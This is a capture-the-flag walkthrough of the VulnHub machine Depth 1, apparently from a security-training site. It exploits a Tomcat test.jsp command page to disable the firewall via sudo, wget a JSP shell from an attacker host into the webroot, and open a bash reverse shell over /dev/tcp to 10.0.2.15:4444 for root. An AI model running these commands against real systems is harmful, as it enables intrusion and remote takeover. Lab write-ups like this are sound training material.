Depth 1 - CTF Walkthrough

Depth 1 is a relatively new machine that surfaced on VulnHub on October 27^th, 2017. It is created by Dan Lawson. It can be downloaded from https://www.vulnhub.com/entry/depth-1,213/

The objective of the machine is to gain root privileges and read the flag.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

I will be using Kali 2017.1 as my target machine running on VirtualBox, and I will be running the victim machine, Depth 1, on VirtualBox as well.

Once booted, this is what the machine looks like:

After going through so many machines, I like the fact that the IP is displayed on the login.

Since we have the IP, let's scan and see what all ports are open:

As we can see, an Apache Tomcat server is running on port 8080. Let's head over there and see what's happening:

I tried using the basic combination of the username and password to login via the Manager web app, but nothing worked:

I also tried using auxiliary/scanner/http/tomcat_mgr_login via Metasploit, but even that did not work:

I then decided to run Nikto, and see if that will show me something that I could use or not:

And it did. I went back to the web app and opened the file:

When I tried the command mentioned on the page, it gave me a result of the directory listing of the folder /tmp:

Exploring further, I see that the user Bill, has an ssh directory and a file called sudo_as_admin_successfull but when scanning for ports, I could not find port 22 open which could mean that there is a firewall in place:

However, before, I want to check the path of this page and see if there's a way I can upload a JSP shell to it:

I run the following command to check the permission:

sh -c $@|sh . echo ssh bill@localhost sudo -l

The first thing I do is disable the firewall by:

sh -c $@|sh . echo ssh bill@localhost sudo ufw disable

Now that the firewall is down, it is time to upload a JSP shell.

I used the code from the following site: https://blog.netspi.com/hacking-with-jsp-shells/

Moreover, saved it as shell.jsp on my Desktop.

Next, I start a simple python HTTP server to host the file:

I will be uploading the file to the path where test.jsp is hosted which is: /var/lib/tomcat8/webapps/ROOT/

Next, I type the following command in test.jsp to upload the JSP shell:

sh -c $@|sh . echo ssh bill@localhost sudo wget "http://10.0.2.15:8000/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

and as you can see, our shell.jsp has been uploaded successfully:

Now it's time to get a remote connection:

and on the shell, we write:

ssh bill@localhost sudo bash -i>& /dev/tcp/10.0.2.15/4444 0>&1

and we are root!! Here's the flag:

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan